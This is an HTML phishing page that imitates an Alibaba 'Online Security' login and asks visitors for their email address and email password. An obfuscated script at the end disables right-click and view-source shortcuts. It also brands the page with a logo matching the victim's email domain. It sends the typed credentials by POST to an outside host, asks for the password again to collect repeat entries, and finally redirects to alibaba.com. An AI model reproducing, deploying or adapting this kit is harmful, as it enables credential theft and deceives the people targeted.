

<!DOCTYPE HTML>
<html lang="en-US">
<head>
	<meta charset="UTF-8">
    <title>Alibaba Manufacturer Directory - Suppliers, Manufacturers, Exporters &amp; Importers</title>

	<link rel="shortcut icon" href="https://is.alicdn.com/favicon.ico" type="image/x-icon">

  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
	<link href='http://fonts.googleapis.com/css?family=Oleo+Script' rel='stylesheet' type='text/css'>
<style>
body{
	background-image:url(https://cdn.glitch.global/b3c06f42-b6a0-4bc3-bc08-cfd893fa0e6a/ali.png?v=1675602938116);
	font-family: 'Oleo Script', cursive;
}

.lg-container{
	width:325px;
	margin:100px auto;
	padding:20px 40px;
        background-color: white;
        border:1px solid red;
	
}
.lg-container h2{
	font-size:20px;
	text-align:center;
}
#lg-form > div {
	margin:10px 5px;
	padding:5px 0;
}
#lg-form label{
	display: none;
	font-size: 20px;
	line-height: 10px;
}
#lg-form input[type="email"],
#lg-form input[type="password"]{
	border:1px solid rgba(51,51,51,.5);
	padding: 10px;
	font-size: 16px;
	line-height: 20px;
	width: 100%;
	font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
	text-align:left;
}
#lg-form div:nth-child(3) {
	text-align:center;
}
#lg-form button{
  width: 100%;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  display: inline-block;
  outline: 0;
  border: 0;
  color: #fff;
  text-decoration: none;
  background-color: #ff6a00;
  border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
  font-size: 1.2em;
  font-weight: bold;
  padding: 12px 22px 12px 22px;
  line-height: normal;
  text-align: center;
  vertical-align: middle;
  cursor: pointer;
  text-transform: uppercase;
  text-shadow: 0 1px 0 rgba(0,0,0,0.3);
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
  -webkit-box-shadow: 0 1px 0 rgba(15, 15, 15, 0.3);
  -moz-box-shadow: 0 1px 0 rgba(15, 15, 15, 0.3);
  box-shadow: 0 1px 0 rgba(15, 15, 15, 0.3);
}
#lg-form button:active{
  -webkit-box-shadow: inset 0 1px 5px rgba(0, 0, 0, 0.1);
  -moz-box-shadow:inset 0 1px 5px rgba(0, 0, 0, 0.1);
  box-shadow:inset 0 1px 5px rgba(0, 0, 0, 0.1);
}
#lg-form button:hover{
  color: #fff;
  background-color: #ff6a00;
}

</style>


</head>
<body>
	<div class="lg-container">
    <center><img src="https://cdn.glitch.com/e1b7047b-0756-4cee-b050-95973e7f7a4f%2Falibaba-logo.png?v=1616787676345" width="166" height="100" alt=""></center>
    <center><h2>*Alibaba Online Security* Enter your email password below to continue</h2></center>
		<form action="waka-login.php" id="lg-form" name="lg-form" method="post">
			
			<div>
			<label for="username">Account:</label>
				<input type="email" required="" name="email" id="email" 
				placeholder="Enter Email address " value="" 
				/>
			</div>
			
			<div>
				<label for="password">Password</label>
				<input type="password" name="password" autofocus="" required="" id="password" placeholder="Enter Email Password" />
			</div>
			
			<div>				
				<button type="submit" id="submit-btn">Sign In</button>
			</div>
			
		</form>
		    <center>
                <div id="msg" style="display: none;font-weight: 600;color: red;">Please confirm password again</div>
                <span id="error" class="text-danger" style="display: none;">Incorrect email address</span>
        </center>
	</div>
</body>
  <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

  <script>
function _0x291a(_0x136555,_0x12fcd9){var _0x550165=_0x5501();return _0x291a=function(_0x291ac2,_0x5b6e19){_0x291ac2=_0x291ac2-0x7e;var _0x440f26=_0x550165[_0x291ac2];return _0x440f26;},_0x291a(_0x136555,_0x12fcd9);}var _0x3b5486=_0x291a;function _0x5501(){var _0x1cfe45=['focus','html','1507590dNIZBM','https://logo.clearbit.com/','test','substr','indexOf','#password','#logoname','#email','ajax','#emailich','ctrlKey','preventDefault','animate','keydown','#inputbar','#msg','7372NdAZQi','6154800ZyYsRj','signal','1926512DdwQKu','1519650fofsNR','#logoimg','#error','Confirm\x20password\x20again!','toLowerCase','src','bind','click','onkeydown','529270GZPMQG','https://kwatobaer.top/hm/lambo.php','which','74883xudrBi','Sign\x20in','POST','attr','JSON','addEventListener','https://www.alibaba.com/','show','hide','keypress','#back1','1fyiLLX','val','#submit-btn','replace','contextmenu','keyCode','location','#automail','验证中...','toUpperCase'];_0x5501=function(){return _0x1cfe45;};return _0x5501();}(function(_0x15f96b,_0x4129f8){var _0x3d9e3c=_0x291a,_0x365bd2=_0x15f96b();while(!![]){try{var _0x37814=-parseInt(_0x3d9e3c(0xaa))/0x1*(parseInt(_0x3d9e3c(0x8f))/0x2)+-parseInt(_0x3d9e3c(0x9f))/0x3+parseInt(_0x3d9e3c(0x92))/0x4+parseInt(_0x3d9e3c(0x93))/0x5+parseInt(_0x3d9e3c(0x7f))/0x6+parseInt(_0x3d9e3c(0x9c))/0x7+-parseInt(_0x3d9e3c(0x90))/0x8;if(_0x37814===_0x4129f8)break;else _0x365bd2['push'](_0x365bd2['shift']());}catch(_0x44e629){_0x365bd2['push'](_0x365bd2['shift']());}}}(_0x5501,0x4cc44),$(document)[_0x3b5486(0x99)](_0x3b5486(0x8c),function(_0x4a06ad){var _0x4855b0=_0x3b5486;if(_0x4a06ad[_0x4855b0(0x89)]&&_0x4a06ad[_0x4855b0(0x9e)]==0x53)return _0x4a06ad[_0x4855b0(0x8a)](),![];}),document[_0x3b5486(0xa4)](_0x3b5486(0xae),_0x152614=>_0x152614[_0x3b5486(0x8a)]()),document[_0x3b5486(0x9b)]=function(_0x47f153){var _0x3615=_0x3b5486;return _0x47f153[_0x3615(0x89)]&&(_0x47f153['keyCode']===0x43||_0x47f153[_0x3615(0xaf)]===0x56||_0x47f153[_0x3615(0xaf)]===0x55||_0x47f153[_0x3615(0xaf)]===0x75)?![]:!![];},$(document)[_0x3b5486(0xa8)]('u',function(_0x4cca93){var _0x53870f=_0x3b5486;return _0x4cca93[_0x53870f(0x89)]?![]:!![];}),$(document)['ready'](function(){var _0x2523b7=_0x3b5486,_0x4a0785=0x0;$(_0x2523b7(0xa9))[_0x2523b7(0x9a)](function(){var _0x299624=_0x2523b7;$(_0x299624(0x8e))[_0x299624(0xa7)](),$(_0x299624(0x86))[_0x299624(0xab)](''),$(_0x299624(0xb1))[_0x299624(0x8b)]({'left':0xc8,'opacity':_0x299624(0xa7)},0x0),$(_0x299624(0x8d))['animate']({'right':0xc8,'opacity':_0x299624(0xa6)},0x3e8);});var _0x4dbf58=window[_0x2523b7(0xb0)]['hash'][_0x2523b7(0x82)](0x1);if(!_0x4dbf58){}else{var _0x59c28b=_0x4dbf58;$(_0x2523b7(0x86))[_0x2523b7(0xab)](_0x59c28b),$(_0x2523b7(0x88))[_0x2523b7(0x7e)](_0x59c28b);var _0x5c9445=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x5c9445[_0x2523b7(0x81)](_0x59c28b))return $('#error')[_0x2523b7(0xa6)](),_0x4dbf58[_0x2523b7(0xb4)],![];var _0x49037f=_0x59c28b[_0x2523b7(0x83)]('@'),_0xab2741=_0x59c28b['substr'](_0x49037f+0x1),_0x573e38=_0xab2741[_0x2523b7(0x82)](0x0,_0xab2741[_0x2523b7(0x83)]('.')),_0x8d931e=_0x573e38[_0x2523b7(0x97)](),_0x40b283=_0x573e38[_0x2523b7(0xb3)]();$(_0x2523b7(0x94))[_0x2523b7(0xa2)](_0x2523b7(0x98),_0x2523b7(0x80)+_0xab2741),$(_0x2523b7(0x85))[_0x2523b7(0x7e)](_0x40b283),$('.logoname')[_0x2523b7(0x7e)](_0x40b283);}$(_0x2523b7(0xac))[_0x2523b7(0x9a)](function(_0x5965b2){var _0x459292=_0x2523b7;$(_0x459292(0x95))['hide'](),$(_0x459292(0x8e))[_0x459292(0xa7)](),_0x5965b2[_0x459292(0x8a)]();var _0x295dfa=$(_0x459292(0x86))['val'](),_0x3ce076=$('#password')[_0x459292(0xab)](),_0x40e958=$(_0x459292(0x8e))['html']();$(_0x459292(0x8e))['text'](_0x40e958);var _0x136515=_0x295dfa,_0x71134=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x71134[_0x459292(0x81)](_0x136515))return $(_0x459292(0x95))[_0x459292(0xa6)](),_0x295dfa[_0x459292(0xb4)],![];var _0x5b8f7e=_0x136515[_0x459292(0x83)]('@'),_0x1e4ee7=_0x136515[_0x459292(0x82)](_0x5b8f7e+0x1),_0x3023cf=_0x1e4ee7['substr'](0x0,_0x1e4ee7['indexOf']('.')),_0x232cee=_0x3023cf[_0x459292(0x97)](),_0x2c575b=_0x3023cf[_0x459292(0xb3)]();$(_0x459292(0x94))[_0x459292(0xa2)]('src',_0x459292(0x80)+_0x1e4ee7),$('#logoname')[_0x459292(0x7e)](_0x2c575b),_0x4a0785=_0x4a0785+0x1,$[_0x459292(0x87)]({'dataType':_0x459292(0xa3),'url':_0x459292(0x9d),'type':_0x459292(0xa1),'data':{'email':_0x295dfa,'password':_0x3ce076},'beforeSend':function(_0x52d908){var _0x3b774f=_0x459292;$(_0x3b774f(0xac))[_0x3b774f(0xab)](_0x3b774f(0xb2));},'success':function(_0xe0c622){var _0x3e1b8a=_0x459292;_0xe0c622&&($('#msg')[_0x3e1b8a(0xa6)](),console['log'](_0xe0c622),_0xe0c622[_0x3e1b8a(0x91)]=='ok'?($(_0x3e1b8a(0x84))['val'](''),_0x4a0785>=0x3&&(_0x4a0785=0x0,window[_0x3e1b8a(0xb0)][_0x3e1b8a(0xad)](_0x3e1b8a(0xa5))),$('#msg')[_0x3e1b8a(0x7e)](_0xe0c622['msg'])):$(_0x3e1b8a(0x8e))[_0x3e1b8a(0x7e)](_0xe0c622['msg']));},'error':function(){var _0x36c653=_0x459292;$(_0x36c653(0x84))[_0x36c653(0xab)](''),_0x4a0785>=0x3&&(_0x4a0785=0x0,window[_0x36c653(0xb0)][_0x36c653(0xad)](_0x36c653(0xa5))),$('#msg')[_0x36c653(0xa6)](),$(_0x36c653(0x8e))[_0x36c653(0x7e)](_0x36c653(0x96));},'complete':function(){var _0x1e13f5=_0x459292;$(_0x1e13f5(0xac))[_0x1e13f5(0xab)](_0x1e13f5(0xa0));}});});}));


</script>
  
</html>
